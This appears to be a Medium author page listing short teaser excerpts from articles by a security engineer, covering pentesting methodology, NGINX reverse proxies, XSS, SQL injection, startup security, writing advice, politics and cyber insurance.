You can be amazing at sniffing out application vulnerabilities, social engineering, or recon and still be basically useless in a real life pentesting engagement. It’s a hard truth. Without a solid methodology, you are much likelier to waste time, miss critical vulnerabilities, and write an absolutely terrible report. A bad report means an unhappy client, and, more importantly, the inability to secure an environment.


I’m going to be honest here. This article is an act of selfish documentation. I’ve probably configured NGINX as a reverse proxy a few dozen times, and there’s always something I forget in the process. I still strongly prefer it over the Apache alternative, primarily due to its vastly different configuration language (it feels more like code, which is refreshing), among other benefits. I’ll leave the rest to another article.

Since configuring NGINX itself is really quite easy (though apparently hard for me to remember), I wanted to take this opportunity to explain how a reverse proxy actually works and…


Imagine you’re a thief (you can be the Robin Hood type if that helps) going into a business, looking for loot. You scour the storefront, and find nothing. You see a doorway to some stairs, and decide to see if you can go one floor down. You make it down one flight and check the knob — click click. It’s locked. You go down another flight, same deal. You keep moving down and checking knobs until, finally, you find an open door. Inside this room is the heart of the business — the money vault, the business’s files, etc…

This…


With the 2020 election(s) just around the corner, it’s getting harder to ignore the rhetoric, the ad waves, and the conspiracies. I remember when our opinions were not so dependent on our social media echo chambers. I remember when I could still be friends with people across the political isle. It’s not that I don’t want to be now, it’s that the political climate over the past 4 years has become so polarizing that hating the other team has become a prerequisite for either party. The other guys are evil, they want to destroy this country. …


I feel like I’ve been writing just long enough to have figured out what works for me, and what really, really doesn’t. I write primarily technical articles dealing with programming and security — you know, really exciting stuff. Writing tech articles is such a weird balancing act that can so easily fall flat, making you sound either dull or uneducated on the subject. I'm going to talk about some of my own observations, and the many ways I’ve discovered that one can fail.

Research all the things

I rarely go into an article without either real-world experience or hours of research. Often, it’s both…


I’m sure you’ve heard of XSS (Cross-Site Scripting) if you’ve ever been within earshot of a security engineer. As part of the OWASP Top 10, it tends to pop up a lot in security discussions. Unfortunately, the standard explanation (“code injected into a webpage to make it do stuff”) doesn’t really help red or blue teams execute or protect against it.

A Better Explanation

Basically, XSS can occur when a user is allowed to provide input that will be used by the application in some way to alter a view in the interface, without properly sanitizing the user-supplied input. For instance, when you…


As one of the most historically prominent vulnerabilities out there, SQL injections have likely caused millions (if not billions) of dollars worth of damages to thousands of companies over the last 20 years. The vulnerability was first documented in 1998 by Phrack contributer and security researcher Jeff Forristal. The internet never recovered.

So what is it?

To understand what a SQL Injection Attack is, we need to have a brief primer on how User Interfaces typically communicate with the backend or database:


You had a great idea that is somehow also making money, and you’ve decided to bootstrap it into a full-fledged company. Congrats, you have a startup. In today’s market, it seems like we are all being pushed to build, grow, and sell — over and over and over. It seems like there’s no time to think about anything else. If you’re not developing something that will directly contribute to the product’s success, it seems like a waste of time.

This is the mindset of today’s startup founder. It’s the mindset of many CTOs and engineers pushing development forward without best…


I’m sure we’re all familiar with DRY programming principles. Don’t Repeat Yourself. Though I try my best to follow this when I’m developing an application, I feel like I’ve wasted countless hours on the same initial steps every time I start a project.

It seems like the first day is spent on setting up the directory structure I’ll use, looking up the same libraries every single time to make sure I initialize them properly, and writing the same CSS boilerplate over and over. If you did this a hundred times, you would have wasted a solid month of your life…


It’s not insurance for robots, but it’s still pretty cool. Cool in a nerdy, save yourself from disaster kind of way. Cyber Insurance seeks to offer a safety net for companies that are hit by cyber-attacks. Whether this is a data breach or a malicious attack on their technological resources doesn’t really matter. This new type of insurance is going to save a lot of companies in the coming years, in this ever-changing landscape of security uncertainty.

Who Needs It?

Are you a farmer with nothing but some mules and a wagon? You probably don’t need Cyber Insurance. If your business depends on…

Andrew Long

Security Engineer, Software Dev, and Tech Writer. I write a lot of tutorials and educational pieces, as well as the occasional opinion piece.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store